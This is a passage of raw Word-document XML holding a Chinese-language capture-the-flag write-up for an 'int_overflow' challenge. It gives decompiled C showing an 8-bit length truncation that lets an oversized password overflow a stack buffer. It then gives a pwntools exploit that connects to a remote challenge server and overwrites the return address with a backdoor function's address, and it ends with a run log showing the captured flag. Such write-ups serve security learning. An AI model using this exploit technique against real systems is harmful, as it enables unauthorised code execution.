      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x19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//0x19u代表无符号 ，uname_max = 0x19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"Hello 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&amp;s);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  puts(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Please input your passwd:"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read(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&amp;buf, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x199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            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//pwd_max = 0x199u 远大于下面的 v3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check_passwd(&amp;buf);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*__cdecl check_passwd(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*result; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// eax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dest; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// [esp+4h] [ebp-14h]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__int8 v3; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// [esp+Fh] [ebp-9h]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//8bit无符号整数，最大255</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  v3 = strlen(s);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//v3 == pwd的长度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v3 &lt;= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3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 || v3 &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8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puts(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Invalid Password"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result =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*)fflush(stdout);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else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puts(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fflush(stdout);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = strcpy(&amp;dest, s);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//dest_stack_size==0xb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//s_stack_size(max_passwd_stack_size)==0x200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v3需要在4到8之间，可以转变为260-264截断，这里的payload的长度为262.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">有后门函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">payload：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pwn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#io  = process("./int_overflow")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">io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remote(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'111.200.241.244'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47612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back_door_addr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0x08048694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io.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"choice:"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io.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username:"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"aaaa"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p32(back_door_addr)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io.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"passwd:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload)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io.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">flag：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">yutao@pwnbaby:~/Desktop$ python 1.py </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] Opening connection to 111.200.241.244 on port 47612: Done</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Switching to interactive mode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Success</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cyberpeace{570351d22dfa4892efd56550fe59aa63}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Got EOF while reading in interactive</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"></w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Closed connection to 111.200.241.244 port 47612</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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2021-03-03T03:17:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-03T03:17:33Z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